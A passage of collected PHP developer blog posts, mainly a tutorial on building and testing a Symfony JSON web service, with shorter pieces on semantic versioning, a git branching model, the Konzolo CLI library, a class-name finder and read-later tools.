* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$em = $this->get('doctrine.orm.entity_manager');
$name = $request->request->get('name');
if (null === $name) {
return new JsonResponse(array('error' => 'The "name" parameter is missing from the request\'s body'), 422);
}
$createdProfile = new Profile($name);
$em->persist($createdProfile);
$em->flush();
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Let's see:
php app/console doctrine:database:drop --force --env=test
make test
Note: Because our last test failed, the database hasn't been removed, so we need to do it manually.
Looks nice! Our endpoint should also fail when a profile with the same name already exists:
<?php
// File: tests/Controller/ProfileCreationControllerTest.php
namespace AppBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
private $em;
protected function setUp()
{
$this->app = new \AppKernel('test', true);
$this->app->boot();
$this->em = $this->app->getContainer()->get('doctrine.orm.entity_manager');
$this->em->beginTransaction();
}
public function testItCreatesProfiles()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Fawlty Towers'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(201, $response->getStatusCode(), $response->getContent());
}
public function testItFailsIfNameIsMissing()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('no-name' => ''));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(422, $response->getStatusCode(), $response->getContent());
}
public function testItFailsIfNameAlreadyExists()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Provençal le Gaulois'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$this->app->handle($request);
$response = $this->app->handle($request);
$this->assertSame(422, $response->getStatusCode(), $response->getContent());
}
protected function tearDown()
{
$this->em->rollback();
$this->em->close();
}
}
Our tests should be broken again:
make test
Another check can fix this awful situation:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\Entity\Profile;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$em = $this->get('doctrine.orm.entity_manager');
$name = $request->request->get('name');
if (null === $name) {
return new JsonResponse(array('error' => 'The "name" parameter is missing from the request\'s body'), 422);
}
if (null !== $em->getRepository('AppBundle:Profile')->findOneByName($name)) {
return new JsonResponse(array('error' => 'The name "'.$name.'" is already taken'), 422);
}
$createdProfile = new Profile($name);
$em->persist($createdProfile);
$em->flush();
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Are we there yet?
php app/console doctrine:database:drop --force --env=test
make test
Yes we are. Here's our last commit for this time:
git add -A
git commit -m 'Added error checks'
Creating an endpoint with Symfony is pretty straightforward: it all comes down to HTTP knowledge.
Our codebase is very small due to the simplicity of our examples, but in a real life application we'll need to add more complexity as new requirements appear.
The pragmatic approach is good for now, but at some point we'll need to refactor our code by creating some services, each with their specific responsibilities, to prevent our application from becoming a big ball of mud where everything is hard to read, impossible to test and expensive to change.
This will be the subject of the next article.
Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the second article of the series on managing Web Services in a Symfony environment. Have a look at the first one: 1. Introduction.
In this post we'll create an empty application and prepare it:
First of all, we need to create an empty Symfony application:
composer create-project symfony/framework-standard-edition ws
Note: Take the time to configure a MySQL database, we'll need it later.
Next we'll configure an Apache virtual host (it should be in /etc/apache2/sites-available/ws.conf):
<VirtualHost *:80>
ServerName ws.local
DocumentRoot /home/foobar/ws/web
ErrorLog "/home/foobar/ws/app/logs/apache_errors.log"
CustomLog "/home/foobar/ws/app/logs/apache_accesses.log" common
<Directory /home/foobar/ws/web>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Require all granted
Order allow,deny
allow from all
</Directory>
</VirtualHost>
Apache will require access to the logs and cache directories. The easiest way
to grant it is to change Apache's user and group to yours in
/etc/apache2/envvars:
export APACHE_RUN_USER=foobar
export APACHE_RUN_GROUP=foobar
In order for this to work we'll update our /etc/hosts file:
echo '127.0.0.1 ws.local' | sudo tee -a /etc/hosts
And finally we'll restart the web server:
sudo service apache2 restart
We should be able to see "Homepage" when browsing http://ws.local/app_dev.php/app/example
Let's commit our work:
git init
git add -A
git ci -m 'Created a standard Symfony application'
As explained in this article, we'll tweak the standard edition a little bit in order to make tests more explicit.
First we create a bootstrapping file:
<?php
// File: app/bootstrap.php
require __DIR__.'/bootstrap.php.cache';
require __DIR__.'/AppKernel.php';
Then we configure PHPUnit to use it:
<?xml version="1.0" encoding="UTF-8"?>
<!-- http://phpunit.de/manual/4.1/en/appendixes.configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/4.1/phpunit.xsd"
backupGlobals="false"
colors="true"
bootstrap="bootstrap.php"
>
<testsuites>
<testsuite name="Project Test Suite">
<directory>../tests</directory>
</testsuite>
</testsuites>
</phpunit>
We've decided to put our tests in a separate tests directory, allowing us to
declare an autoload mapping specific to development. To fully optimize our
autoloading, we'll also define our src/AppBundle folder as a path for the
AppBundle namespace, using PSR-4:
{
"name": "symfony/framework-standard-edition",
"license": "MIT",
"type": "project",
"description": "The \"Symfony Standard Edition\" distribution",
"autoload": {
"psr-4": { "AppBundle\\": "src/AppBundle" }
},
"autoload-dev": {
"psr-4": { "AppBundle\\Tests\\": "tests" }
},
"require": {
"php": ">=5.3.3",
"symfony/symfony": "2.6.*",
"doctrine/orm": "~2.2,>=2.2.3",
"doctrine/doctrine-bundle": "~1.2",
"twig/extensions": "~1.0",
"symfony/assetic-bundle": "~2.3",
"symfony/swiftmailer-bundle": "~2.3",
"symfony/monolog-bundle": "~2.4",
"sensio/distribution-bundle": "~3.0.12",
"sensio/framework-extra-bundle": "~3.0",
"incenteev/composer-parameter-handler": "~2.0"
},
"require-dev": {
"sensio/generator-bundle": "~2.3"
},
"scripts": {
"post-root-package-install": [
"SymfonyStandard\\Composer::hookRootPackageInstall"
],
"post-install-cmd": [
"Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::removeSymfonyStandardFiles"
],
"post-update-cmd": [
"Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::removeSymfonyStandardFiles"
]
},
"config": {
"bin-dir": "bin"
},
"extra": {
"symfony-app-dir": "app",
"symfony-web-dir": "web",
"symfony-assets-install": "relative",
"incenteev-parameters": {
"file": "app/config/parameters.yml"
},
"branch-alias": {
"dev-master": "2.6-dev"
}
}
}
To make it official, we need to run the following command:
composer dump-autoload
We'll also install phpspec:
composer require phpspec/phpspec:~2.1
With this our tests will be awesome! Time to commit:
git add -A
git commit -m 'Configured tests'
Symfony provides the posted data in the Request's request attribute, except
when the content type is application/json, as it will be in our case. To fix this
behavior we'll follow the steps described in this article.
Let's start by the creation of an event listener:
<?php
// File: src/AppBundle/EventListener/SubmitJsonListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
/**
* PHP does not populate $_POST with the data submitted via a JSON Request,
* causing an empty $request->request.
*
* This listener fixes this.
*/
class SubmitJsonListener
{
/**
* @param GetResponseEvent $event
*/
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$hasBeenSubmitted = in_array($request->getMethod(), array('POST', 'PUT'), true);
$isJson = ('application/json' === $request->headers->get('Content-Type'));
if (!$hasBeenSubmitted || !$isJson) {
return;
}
$data = json_decode($request->getContent(), true);
if (JSON_ERROR_NONE !== json_last_error()) {
$event->setResponse(new JsonResponse(array('error' => 'Invalid or malformed JSON'), 400));
return;
}
$request->request->add($data ?: array());
}
}
Finally we'll register it in the Dependency Injection Container:
# File: app/config/services.yml
services:
app.submit_json_listener:
class: AppBundle\EventListener\SubmitJsonListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
HTTP basic authentication can be configured through the app/config/security.yml
file, as described in the official documentation.
In the end we should have something like this:
# app/config/security.yml
security:
encoders:
Symfony\Component\Security\Core\User\User: plaintext
providers:
in_memory:
memory:
users:
spanish_inquisition:
password: 'NobodyExpectsIt!'
roles:
- ROLE_USER
firewalls:
dev:
pattern: ^/(_(profiler|wdt)|css|images|js)/
security: false
default:
anonymous: ~
http_basic: ~
stateless: true
access_control:
- { path: /.*, roles: ROLE_USER }
Now to comply with our description we need to customize the error. We can do so using another event listener:
<?php
// File: src/AppBundle/EventListener/ForbiddenExceptionListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
use Symfony\Component\Security\Core\Exception\AccessDeniedException;
/**
* Returns a JSON response describing the error when authentication fails,
* instead of Symfony's default error page.
*/
class ForbiddenExceptionListener
{
/**
* @param GetResponseForExceptionEvent $event
*/
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
if (!$exception instanceof AccessDeniedException) {
return;
}
$error = 'The credentials are either missing or incorrect';
$event->setResponse(new JsonResponse(array('error' => $error), 403));
}
}
And to register it:
# File: app/config/services.yml
services:
app.submit_json_listener:
class: AppBundle\EventListener\SubmitJsonListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.forbidden_exception_listener:
class: AppBundle\EventListener\ForbiddenExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
Note: the Symfony Security event listener has a priority set to 0. In order for our listener to be executed, we need to set a higher one, like 10.
As you can see by browsing http://ws.local/app_dev.php/app/example, we now need
to authenticate as spanish_inquisition with the NobodyExpectsIt! password to
access the page.
This is enough for today, we'll commit our work:
git add -A
git commit -m 'Created custom event listeners'
Our application is now ready!
In the [next article](/2015/01/28/sf-ws-part-2-2-creation-pragmatic.html) we'll create the first endpoint, the creation of profiles, using a pragmatic approach.
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
Welcome to this new series of articles on managing Web Services in a Symfony environment. Its purpose is to provide an example; it doesn't pretend to be the best solution. It requires you to know the basics of Symfony (if you know what a service is, you're good) and of web services (basically, that they're a way to provide data remotely).
Spoiler alert: There won't be much Symfony specific code ;) .
In this post we'll describe the different endpoints of the (fake) web service which will be used as a reference throughout the whole series:
The posted and returned resources will always be wrapped in a JSON object.
All endpoints require HTTP Basic Authentication with the following credentials:
- username: spanish_inquisition
- password: NobodyExpectsIt!

If those credentials are missing or wrong (403 FORBIDDEN), it will return:
{
"error": "The credentials are either missing or incorrect"
}
POST http://ws.local/api/v1/profiles

The request body should be as follows:
{
"name": "Fawlty Tower"
}
In case of success (201 CREATED), it will return:
{
"id": 23,
"name": "Fawlty Tower"
}
If the request's body contains malformed JSON (400 BAD REQUEST), it will return:
{
"error": "Invalid or malformed JSON"
}
If the name parameter is missing from the request's body (422 UNPROCESSABLE ENTITY),
it will return:
{
"error": "The \"name\" parameter is missing from the request's body"
}
If the name already exists (422 UNPROCESSABLE ENTITY), it will return:
{
"error": "The name \"Provençal le Gaulois\" is already taken"
}
DELETE http://ws.local/api/v1/profiles/{id}

This endpoint will always return an empty body (204 NO CONTENT).
So basically we can create and remove profiles, which have an identifier and a name.
In the next article we'll see how to build such a web service.
TL;DR: Links I tweeted during 2014
I've tweeted a lot of links in 2014, so in order to keep track of them I've decided to list them here:
Warning: The order and categories are quite random.
Interface suffix and Abstract prefix is nothing else than an acceptance of your failure to name things clear in the first place. — @everzet

Generators in Node.js: Common Misconceptions and Three Good Use Cases
Best resources about methodologies on Symfony, PHP, DDD, BDD ...
TL;DR: A library's public API can be: fully qualified class names, object types, exceptions, method names and arguments.
When working on a project, every change made to it can possibly break its usage. Sometimes this is because we introduced a bug, but some other times this is because the project's usage needed to be changed.
Or did it?
In this article, we will discuss semantic versioning and the notion of a public API.
In order to make the migration between two versions easier for users, we can use Semantic Versioning, which can be summed up as follows:
Given a version number MAJOR.MINOR.PATCH, increment the:
- MAJOR version when you make incompatible API changes
- MINOR version when you add functionality in a backwards-compatible manner
- PATCH version when you make backwards-compatible bug fixes
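As a quick sanity check of that ordering, PHP's built-in version_compare() follows the same rules for plain MAJOR.MINOR.PATCH strings:

```php
<?php
// Illustrating the version ordering semantic versioning relies on,
// using PHP's built-in version_compare().

var_dump(version_compare('1.2.3', '1.2.4', '<')); // patch bump: bug fix, safe to upgrade
var_dump(version_compare('1.2.4', '1.3.0', '<')); // minor bump: new features, backwards compatible
var_dump(version_compare('1.3.0', '2.0.0', '<')); // major bump: the public API may break
```

Each call prints bool(true): a patch is "smaller" than a minor, which is "smaller" than a major.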
The trick is to define a "public API" (what the user actually use) and promise that we won't break it as long as we don't increment the MAJOR version.
The "public API" will vary between projects:
Let's focus on libraries.
When I started the Redaktilo library I had a lot of decisions to make:
I knew that I could make the wrong choices, which would mean changing names, types, arguments, etc. Basically, for the developers using the library it would mean breaking their code.
In order to avoid that as much as possible, I've decided to minimize the number
of classes the developers would use: a Text model and an Editor service.
Editor doesn't contain any logic, it relies on several "private" classes to do
the actual job. It's a Facade.
So my public API was the Gnugat\Redaktilo\Editor's fully qualified classname
(full namespace and the class name), and its methods (name and arguments).
Later on in the project we introduced a version that didn't change the defined public API, but broke the projects that were using Redaktilo: the issue was that we added a new argument to a private class's constructor.
Therefore the public API was extended to every constructor.
To fix the backward compatibility break, we made this new argument optional.
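Here's a hedged sketch of that fix — the class and the argument are made up for illustration, not Redaktilo's actual code:

```php
<?php
// Hypothetical sketch: adding a constructor argument without breaking
// existing instantiations, by giving it a default value.

class LineJoiner
{
    private $eol;

    // The new argument is optional, so `new LineJoiner()` keeps working.
    public function __construct($eol = "\n")
    {
        $this->eol = $eol;
    }

    public function join(array $lines)
    {
        return implode($this->eol, $lines);
    }
}

$old = new LineJoiner();         // pre-existing calls are unaffected
$new = new LineJoiner("\r\n");   // the new capability is opt-in
echo $old->join(array('a', 'b')); // prints "a" and "b" separated by a newline
```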
Some time passed and we've decided to re-organize the project's exceptions:
moving them to their own sub-namespace (Gnugat\Redaktilo\Exception)
and throwing only exceptions we owned.
But by doing so we could potentially break projects using our library.
Hence we extended the public API to exceptions.
To avoid backward compatible breaks we simply duplicated the exceptions: the new ones in the sub-namespace contain all the logic and inherit from the old exceptions to get their types.
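A sketch of that trick, with illustrative names (the real Redaktilo exceptions may differ; the sub-namespace is simulated here with a class-name prefix to keep the example self-contained):

```php
<?php
// Hypothetical sketch of the exception move: the relocated exception
// inherits from the old one, so existing catch blocks keep working.

// The historical exception, part of the public API since 1.0:
class OldPatternNotFoundException extends RuntimeException {}

// The relocated exception: it carries the logic from now on, and inherits
// the old type purely for backward compatibility.
class NewPatternNotFoundException extends OldPatternNotFoundException {}

try {
    throw new NewPatternNotFoundException('pattern not found');
} catch (OldPatternNotFoundException $e) {
    // Code written against the old type still catches the new one.
    echo 'caught: ', $e->getMessage(), "\n";
}
```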
Defining a public API doesn't mean we can't make changes to it:
Those changes will introduce deprecations that will be removed only when the MAJOR version is incremented.
This can be documented directly in the code, using phpdoc:
use @deprecated <since-version> <what to use instead>.
This can also be described in a migration documentation (e.g. UPGRADE-2.0.md).
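For example, a deprecated method can be kept as a thin wrapper around its replacement until the next MAJOR version (the method names here are illustrative):

```php
<?php
// Illustrative: keeping a deprecated method as a thin wrapper around its
// replacement, documented with the @deprecated phpdoc tag.

class Editor
{
    /**
     * @deprecated 1.1 use jumpBelow() instead
     */
    public function jumpDownTo($pattern)
    {
        return $this->jumpBelow($pattern);
    }

    public function jumpBelow($pattern)
    {
        return 'jumped below ' . $pattern;
    }
}

$editor = new Editor();
// Both calls behave identically, so users can migrate at their own pace.
echo $editor->jumpDownTo('line'), "\n";
```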
Semantic versioning only applies from version 1.0.0 onward: if you tag your
project as being in version 0.MINOR.PATCH, you are allowed to break everything.
But remember that this will make your project very unstable, and people won't
trust it.
In theory you could break everything again when incrementing the MAJOR version (e.g. from version 1 to version 2), but this won't be appealing at all for people that already use your project. Try to make as few changes as possible, document them and give time to your users to stop using deprecated stuff.
Semantic versioning is a versioning methodology with its own constraints and advantages. It gives high priority to the user's experience, so you have to draw a line between what should be used (the public API) and what shouldn't (everything private).
Changes to the public API can be made by keeping the old stuff and document it as deprecated.
When creating a library, remember that exceptions and all constructors (even of private classes) are part of the public API.
Note: Many thanks to Loïck Piera for his help. Without him, I'd still think that declaring a class as being part of the public API is sufficient.
TL;DR: Branch only from master, merge back when done and immediately deploy.
Git proposes a branch system with the possibility to merge them together, allowing you to separate released code from work in progress one.
Git flows have been created to help you keep the same process in your team. In this article, we'll have a look at @jbenet's simple git branching model:
- master must always be deployable.
- all changes are made through feature branches (pull-request + merge)
- rebase to avoid/resolve conflicts; merge into master
Changes can be new features, bug fixes, enhancements. They're all coming from master:
git checkout master
git checkout -b my-changes
Once you're happy with your branch, you need to update it with the last changes from master:
git checkout master
git pull --rebase
git checkout my-changes
git rebase master
git push -fu origin my-changes
Note: `rebase` will rewrite your commits; their dates will be changed (and therefore their hashes will be changed).
Check your tests, the coding standards and ask for a code review.
You can list conflicts (if any):
git status
Edit your files and then mark them as solved:
git add <file>
When all conflicted files have been resolved, you can continue:
git rebase --continue
Here's a to-do list you can use to check whether a branch is ready to be merged:
If everything is ok with your change, then you can merge it into master:
git checkout master
git merge --no-ff my-changes
git push
git push origin :my-changes
git branch -D my-changes
It's now time to deploy! You can make a tag:
git tag -a <version>
git push --tags
Make small changes, release often.
Deprecated: This article has been deprecated.
TL;DR: Konzolo can be used to create minimalistic CLI applications, or to implement the command design pattern.
After implementing the same feature in many projects, I usually have the reflex to turn it into a library. Konzolo is one of them :) .
In this article we'll see its features:
Let's create a "hello world" command:
<?php
namespace Acme\Demo\Command;
use Gnugat\Konzolo\Command;
use Gnugat\Konzolo\Input;
class HelloWorldCommand implements Command
{
public function execute(Input $input)
{
$name = $input->getArgument('name');
echo "Hello $name\n";
return Command::EXIT_SUCCESS;
}
}
Note: If the name argument is missing, an exception will be thrown. Keep reading to know more about those exceptions.
We only have to implement the execute method, which receives a convenient
Input class and returns 0 on success (actually this is optional).
Now that we have a command, let's put it in an application:
<?php
// File: console.php
use Acme\Demo\Command\HelloWorldCommand;
use Gnugat\Konzolo\Application;
use Gnugat\Konzolo\Input;
require __DIR__.'/vendor/autoload.php';
$input = new Input($argv[1]); // command name (acme:hello-world)
if (isset($argv[2])) {
$input->setArgument('name', $argv[2]);
}
$application = new Application();
$application->addCommand('acme:hello-world', new HelloWorldCommand());
$application->run($input);
You can then run it:
php console.php acme:hello-world Igor
If you need to validate the input, you can create a constraint:
<?php
namespace Acme\Demo\Validation;
use Gnugat\Konzolo\Exception\InvalidInputException;
use Gnugat\Konzolo\Input;
use Gnugat\Konzolo\Validation\InputConstraint;
class NoWorldNameConstraint implements InputConstraint
{
public function throwIfInvalid(Input $input)
{
$name = $input->getArgument('name');
if ('World' === $name) {
throw new InvalidInputException($input, 'The "name" parameter must not be set to "World"');
}
}
}
This constraint can be used directly in the command, as a dependency:
<?php
namespace Acme\Demo\Command;
use Acme\Demo\Validation\NoWorldNameConstraint;
use Gnugat\Konzolo\Command;
use Gnugat\Konzolo\Input;
class HelloWorldCommand implements Command
{
private $noWorldNameConstraint;
public function __construct(NoWorldNameConstraint $noWorldNameConstraint)
{
$this->noWorldNameConstraint = $noWorldNameConstraint;
}
public function execute(Input $input)
{
$this->noWorldNameConstraint->throwIfInvalid($input);
$name = $input->getArgument('name');
echo "Hello $name\n";
return Command::EXIT_SUCCESS;
}
}
And then inject it:
<?php
// File: console.php
use Acme\Demo\Command\HelloWorldCommand;
use Acme\Demo\Validation\NoWorldNameConstraint;
use Gnugat\Konzolo\Application;
use Gnugat\Konzolo\Input;
require __DIR__.'/vendor/autoload.php';
$input = new Input($argv[1]); // command name (acme:hello-world)
if (isset($argv[2])) {
$input->setArgument('name', $argv[2]);
}
$application = new Application();
$application->addCommand('acme:hello-world', new HelloWorldCommand(new NoWorldNameConstraint()));
$application->run($input);
More conveniently, the command can depend on a validator:
<?php
namespace Acme\Demo\Command;
use Gnugat\Konzolo\Command;
use Gnugat\Konzolo\Input;
use Gnugat\Konzolo\Validation\InputValidator;
class HelloWorldCommand implements Command
{
private $validator;
public function __construct(InputValidator $validator)
{
$this->validator = $validator;
}
public function execute(Input $input)
{
$this->validator->throwIfInvalid($input);
$name = $input->getArgument('name');
echo "Hello $name\n";
return Command::EXIT_SUCCESS;
}
}
You can add many constraints to a validator, and set priorities:
<?php
// File: console.php
use Acme\Demo\Command\HelloWorldCommand;
use Acme\Demo\Validation\NoWorldNameConstraint;
use Gnugat\Konzolo\Application;
use Gnugat\Konzolo\Input;
use Gnugat\Konzolo\Validation\InputValidator;
require __DIR__.'/vendor/autoload.php';
$input = new Input($argv[1]); // command name (acme:hello-world)
if (isset($argv[2])) {
$input->setArgument('name', $argv[2]);
}
$helloWorldValidator = new InputValidator();
$helloWorldValidator->addConstraint(new NoWorldNameConstraint(), 42);
$application = new Application();
$application->addCommand('acme:hello-world', new HelloWorldCommand($helloWorldValidator));
$application->run($input);
Note: The higher the priority, the sooner the constraint will be executed. For example, a constraint with priority 1337 will be executed before another one with priority 23 (even if this second one was added to the validator first).
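The ordering rule can be sketched in plain PHP (this illustrates the behaviour described above, not Konzolo's actual implementation; the constraint names are made up):

```php
<?php

// Constraints grouped by priority; higher priorities must run first.
$constraintsByPriority = array();
$constraintsByPriority[23][] = 'added first, low priority';
$constraintsByPriority[1337][] = 'added second, high priority';

// Sort the priority keys from highest to lowest.
krsort($constraintsByPriority);

// Flatten into the final execution order.
$executionOrder = array();
foreach ($constraintsByPriority as $priority => $constraints) {
    foreach ($constraints as $constraint) {
        $executionOrder[] = $constraint;
    }
}

// The priority-1337 constraint comes first, even though it was added last.
print_r($executionOrder);
```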
Konzolo's exceptions all implement the Gnugat\Konzolo\Exception\Exception interface.
This means you can catch every single one of them using this type. They also
extend the standard \Exception class, so if you don't care about Konzolo-specific
exceptions, you can catch them all!
This is useful for example in Symfony2: you can create a Konzolo exception listener.
You can find more about the different kind of exceptions and their specific methods in its dedicated documentation.
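This marker-interface pattern is easy to see in a self-contained sketch (the interface and exception names below are illustrative stand-ins, not Konzolo's actual classes):

```php
<?php

// Marker interface implemented by every library exception...
interface LibraryException {}

// ...while still extending a standard exception class.
class MissingArgumentException extends \InvalidArgumentException implements LibraryException {}

function caughtAs($exception) {
    try {
        throw $exception;
    } catch (LibraryException $e) {
        // Only exceptions coming from the library land here.
        return 'library exception';
    } catch (\Exception $e) {
        // Everything else still extends \Exception.
        return 'any exception';
    }
}

echo caughtAs(new MissingArgumentException('no "name" argument')), "\n"; // library exception
echo caughtAs(new \RuntimeException('unrelated')), "\n";                 // any exception
```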
We have seen how to create commands and validate their inputs.
Our examples showed how to create a CLI application, but Konzolo is mainly aimed at being used in applications (not only CLI ones). For example, Redaktilo uses internally a system of Command/CommandInvoker, using an array as input and sanitizer as a validation mechanism. All this logic can now be externalized, thanks to Konzolo!
I'd like to keep Konzolo as small as possible, but here's a list of possible features it could see in the future:
Currently we can find commands by their exact names. But wouldn't it be nice if we could just provide part of a name? Or an alias?
Creating input manually isn't always what we need. A factory that creates one from an array could improve the situation.
TL;DR: Nomo Spaco finds a given project's PHP files and reads them to give you the available Fully Qualified ClassNames.
PHP provides the following function to find the declared classes of a project: get_declared_classes.
However this function only lists the classes which have been loaded (included/required) before its call: the usage of an autoloader breaks it (Composer for example).
In this article, we'll see how to solve this problem.
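To see the limitation concretely, here's a small self-contained sketch (`LazilyLoaded` is a made-up class name, and `eval` stands in for a file that an autoloader would only include on demand):

```php
<?php

// get_declared_classes() only lists classes PHP has already loaded:
// internal ones, plus whatever has been included so far. A class an
// autoloader *could* load on demand doesn't appear until it is loaded.
$before = get_declared_classes();

// Define a class at runtime, simulating a late include.
eval('class LazilyLoaded {}');

$after = get_declared_classes();

var_dump(in_array('LazilyLoaded', $before, true)); // bool(false)
var_dump(in_array('LazilyLoaded', $after, true));  // bool(true)
```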
The first step is to find a way to get the Fully Qualified ClassName (fqcn) of a single class.
A solution would be to read in its source file: if the project follows the PSR-0 or PSR-4 standards, the file should only contain one class and its filename should be the same as the classname.
Let's create a function that retrieves the namespace declaration:
<?php
function _get_full_namespace($filename) {
$lines = file($filename);
$namespaceLines = preg_grep('/^namespace /', $lines);
$namespaceLine = array_shift($namespaceLines); // array_shift() expects a variable, not a function result
$match = array();
preg_match('/^namespace (.*);$/', $namespaceLine, $match);
$fullNamespace = array_pop($match);
return $fullNamespace;
}
Now let's create a function that chops down the filename to get the classname:
<?php
function _get_class_name($filename) {
$directoriesAndFilename = explode('/', $filename);
$filename = array_pop($directoriesAndFilename);
$nameAndExtension = explode('.', $filename);
$className = array_shift($nameAndExtension);
return $className;
}
That was easy! To get the Fully Qualified ClassName from a filename we can simply call those two functions:
<?php
$fqcn = _get_full_namespace($filename).'\\'._get_class_name($filename);
The second step is to find the filenames of all the project's classes. Let's use the Symfony2 Finder Component:
<?php
use Symfony\Component\Finder\Finder;
require __DIR__.'/vendor/autoload.php';
function _get_filenames($path) {
$finderFiles = Finder::create()->files()->in($path)->name('*.php');
$filenames = array();
foreach ($finderFiles as $finderFile) {
$filenames[] = $finderFile->getRealpath();
}
return $filenames;
}
And that's it! We can now create a function which calls those three:
<?php
function get_all_fcqns($path) {
$filenames = _get_filenames($path);
$fcqns = array();
foreach ($filenames as $filename) {
$fcqns[] = _get_full_namespace($filename).'\\'._get_class_name($filename);
}
return $fcqns;
}
It can simply be used like this:
<?php
$allFcqns = get_all_fcqns(__DIR__);
By finding all the PHP filenames in a project and reading them to extract their namespace and classname, we can easily find all the available Fully Qualified ClassNames.
The given functions are not meant to be used in production:
(compare with a single call to get_declared_classes()). I've started a proof of concept: Nomo Spaco. Hopefully it will grow to be more efficient, safer and tested. But for now it provides you with a package, so you don't have to copy-paste anything :) .
TL;DR: Use IFTTT and Pocket to read tweets, blogs and stuff later (in a commute, in the loo, anywhere).
We often find interesting links on the web, but don't have time to read them immediately. This article will describe how to efficiently manage them so we can read them later.
Note: this is an updated version of an article written ten months ago.
We all have different strategies to "bookmark" links: actually bookmarking them, favoriting a tweet, subscribing to an RSS feed... The problem arises when we do all of those at the same time: wouldn't it be nice to have a single place to read them all?
We could use our emails for this: we check them often, we can archive them, favorite them or delete them. Inbox from Google makes the task even easier: we can snooze an email so it only appears at a given time, or a given location.
The problem is that it mixes "bookmarks" and "notifications": we could accidentally ignore a business email by mistaking it for a "bookmark".
But don't panic! There's an application for this: Pocket (formerly "Read it later"). The advantage of Pocket is that you can install an extension in your browser so you can save a link or a tweet, and there's a mobile application which works offline, so you can read in the subway if you want.
Note: Pocket's main page is the list of items to read; you can then favorite them, tag them, archive them or delete them.
The Pocket extension allows us to manually save links, but what about RSS feeds? What if we're used to favoriting tweets (old habits die hard)?
Well there's an application for this: If This Then That. Basically you can select one of the (many) supported triggers (RSS feed, tweet favoriting and others), then select one of the (many) supported actions (save to pocket, send an email and others).
All the tools are here! They're free of charge and they follow the philosophy "do one thing and do it well".
I personally store every links to read later in Pocket, either using the browser extension or with IFTTT using the following recipe templates:
I then read everything in the subway (no network, but Pocket preloads the items and keeps them available offline).
If you have trouble going back to Pocket, have a look at Muna: it should soon be able to send you a digested email of your Pocket's links to read, every morning.
I hope you enjoyed this article, tweet me your questions/comments if you have any :) .
TL;DR: Only check the status and exit code, don't use the given TestCase.
Provided that your controllers and commands are thin and they rely on services which are heavily unit tested, only checking the status and exit code in your functional test should be entirely sufficient.
Note: Checking at least the status and exit code is recommended by Symfony's Official Best Practices.
In this article, we will see how easy and quick it is to write them.
If you're familiar with Symfony2, you might use the provided KernelTestCase to write your tests with PHPUnit.
The whole purpose of this file is to create an instance of the application's Kernel, by guessing its localization. The problem with this approach is that it ties you to the PHPUnit test framework. If you have a look at its code, you'll also find it a bit complicated.
Note:
WebTestCase also makes a crawler available, which we don't need as we only intend on checking the status code, not the body.
Let's take an easier way: we will create a bootstrap file which requires the kernel's file:
<?php
// File: app/bootstrap.php
require __DIR__.'/bootstrap.php.cache';
require __DIR__.'/AppKernel.php';
Now all you need to do for your tests is to use this file. For example with PHPUnit:
<?xml version="1.0" encoding="UTF-8"?>
